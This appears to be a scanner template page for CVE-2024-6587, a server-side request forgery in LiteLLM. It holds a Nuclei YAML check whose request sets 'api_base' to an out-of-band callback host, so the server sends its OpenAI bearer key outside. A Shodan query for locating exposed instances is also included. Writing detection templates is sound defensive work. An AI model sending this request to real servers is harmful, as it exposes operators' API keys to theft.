LiteLLM - Server-Side Request Forgery

ID: CVE-2024-6587

Severity: high

Author: pdresearch,iamnoooob,rootxharsh,lambdasawa

Tags: cve,cve2024,ssrf,openai,litellm

Description

LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.

YAML Source

id: CVE-2024-6587

info:
  name: LiteLLM - Server-Side Request Forgery
  author: pdresearch,iamnoooob,rootxharsh,lambdasawa
  severity: high
  description: |
    LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
  reference:
    - https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6587
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:439373620
  tags: cve,cve2024,ssrf,openai,litellm

http:
  - raw:
      - |
        POST /chat/completions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "model": "command-nightly",
          "messages": [
            {
              "content": "Hello, how are you?",
              "role": "user"
            }
          ],
          "api_base": "https://{{interactsh-url}}"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "Bearer"
# digest: 4a0a004730450220193f7ee230257ecb0ad4d5fbe0a4078342c855d4c111275542376aa589c413a202210088bbdd3e6571dbb82f62372894472a343989b63941a343a955301e4de6758627:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6587.yaml"

View on Github